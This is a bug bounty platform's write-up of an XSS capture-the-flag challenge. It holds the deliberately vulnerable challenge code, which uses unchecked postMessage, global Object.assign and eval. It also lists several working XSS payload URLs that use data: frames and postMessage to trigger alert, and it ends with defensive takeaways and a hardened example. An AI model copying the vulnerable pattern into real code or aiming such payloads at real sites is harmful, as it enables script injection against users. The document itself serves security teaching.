A couple of days ago we released an XSS challenge. Within a few hours of sending out the tweet, we could see it was a success, so we decided to share a blog post with the lovely community.
For those who still want to try, the challenge is still up! => https://challenge.intigriti.io <=
In case it’s not available anymore or you want to host the challenge yourself, you can find the code below.
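// The iframe URL comes from the fragment; "script", "<" and ">" are replaced with "forbidden".
const url = new URL(decodeURIComponent(document.location.hash.substr(1))).href.replace(/script|<|>/gi, "forbidden");
const iframe = document.createElement("iframe");
iframe.src = url;
document.body.appendChild(iframe);
iframe.onload = function () {
  window.addEventListener("message", executeCtx, false);
};
function executeCtx(e) {
  // Only the sending window is checked, not the origin of the message.
  if (e.source == iframe.contentWindow) {
    e.data.location = window.location;
    // Every property of the message becomes a global variable.
    Object.assign(window, e.data);
    eval(url);
  }
}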
Solution
We could write a detailed explanation of how to solve this challenge, but we couldn’t do a better job than Dominic and dPhoeniixx. Both researchers shared a well-written and very detailed blog post. You can find the link below.

Wondering how this challenge could be solved in a different way? Take a look at the payloads shared below.
https://challenge.intigriti.io/#data:text/html;var%20text=text;var%20html=html;alert(xss)//;base64,PGh0bWw+PGJvZHkgb25sb2FkPXhzcygpPjxzY3JpcHQ+IGZ1bmN0aW9uIHhzcygpIHsgcGFyZW50LnBvc3RNZXNzYWdlKHsneHNzJzogIm4wdG0zIn0sICcqJyk7IH07IDwvc2NyaXB0Pg==
by n0tm3
https://challenge.intigriti.io/#data:text/html,alert()//%253Csvg/onload=%27top.postMessage(%7B%22text%22:%201%7D,%20%22*%22);top.postMessage(%7B%22html%22:%201%7D,%20%22*%22)%27%253E
by Karel_Origin
https://challenge.intigriti.io/#data:text/html;var%20text=alert%28%29;var%20html;base64,YWE8c3ZnL29ubG9hZD0idG9wLnBvc3RNZXNzYWdlKDAsJyonKSI+11
by terjanq
https://challenge.intigriti.io/#data:text/html,alert(document.domain);//%253csvg%20onload=%22parent.postMessage({text:4,html:1},'*');%22%253e
by daudmalik06
https://challenge.intigriti.io/#data:text/html,alert(document.domain)//%253C%2553cript%253Ewindow.parent.postMessage({text:%22%22,html:%22%22}%2C%20%22*%22)%253C%2F%2553cript%253E
by _zulln
One of the most common mistakes we saw was people executing the alert box inside the iframe. That is not a valid solution, because the JavaScript doesn’t get triggered on challenge.intigriti.io but in the iframe itself (domain = null).
Overview of the tips
The four tips shared during the challenge:
First tip: “It’s all about that base, ’bout that base”.
Second tip: “Define the undefined”.
Third tip: “You don’t need any external resources.”
Fourth tip: “Look for the charset.”
Key takeaways
- Instead of blindly using a wordlist of payloads, understand what you are doing. Go through the challenge step by step and make use of the debugger built into your browser.
- Do not trust user input. Input validation is the key!
- Seeing a message event? Make sure you check the origin!
- Avoid the usage of eval().
- Do not give up. Patience is key.
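The takeaways on input validation, origin checks and eval(), applied to a loader and message handler shaped like the challenge's. This is an added example, not the challenge's or intigriti's own code; `TRUSTED_ORIGIN`, `ALLOWED_KEYS`, the function names and the sample inputs are assumptions made for the sketch.

```javascript
// Added example: origin, scheme and field names below are assumptions.
const TRUSTED_ORIGIN = "https://widgets.example"; // hypothetical embed origin
const ALLOWED_KEYS = new Set(["title", "height"]); // hypothetical message fields

// Parse the fragment and accept only https URLs on the trusted origin.
// Returns the normalised URL string, or null when the input is rejected.
function frameUrlFromHash(hash) {
  let url;
  try {
    url = new URL(decodeURIComponent(hash.replace(/^#/, "")));
  } catch {
    return null; // malformed percent-encoding or not an absolute URL
  }
  if (url.protocol !== "https:" || url.origin !== TRUSTED_ORIGIN) return null;
  return url.href;
}

// Validate a message event, then copy allowlisted primitive fields into
// `state`. Nothing is evaluated and nothing is written to the global object.
function acceptMessage(event, frameWindow, state) {
  if (event.origin !== TRUSTED_ORIGIN) return false; // data: frames report "null"
  if (event.source !== frameWindow) return false; // not the frame we created
  const data = event.data;
  if (data === null || typeof data !== "object" || Array.isArray(data)) return false;
  for (const [key, value] of Object.entries(data)) {
    if (!ALLOWED_KEYS.has(key)) return false; // unexpected field: drop the message
    if (typeof value !== "string" && typeof value !== "number") return false;
  }
  Object.assign(state, data); // target is a private object, never `window`
  return true;
}

// Constructed sample inputs; demoFrame stands in for iframe.contentWindow.
const demoFrame = {};
const demoState = {};
console.log(frameUrlFromHash("#data:text/html,hello"));
console.log(frameUrlFromHash("#https://widgets.example/embed?id=1"));
console.log(acceptMessage({ origin: "null", source: demoFrame, data: { text: 1 } }, demoFrame, demoState));
console.log(acceptMessage({ origin: TRUSTED_ORIGIN, source: demoFrame, data: { title: "ok", height: 300 } }, demoFrame, demoState));
console.log(demoState);
```

Checking `event.origin` in addition to `event.source` is what rejects a frame whose content was supplied through a `data:` URL, since such a frame has an opaque origin.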
Thank you!
A special thanks to @filedescriptor and @edoverflow for hardening our challenge!
Thanks to the community for participating in the challenge and congratulations to the 90 researchers who solved the challenge. A shout-out to the winner fenrir, who won a Burp License, swag package and private invites on our platform.
Want more?
Follow us on Twitter and don’t forget to subscribe to our weekly Bug Bytes, a newsletter curated by Pentester Land & powered by intigriti containing more write-ups and helpful resources.
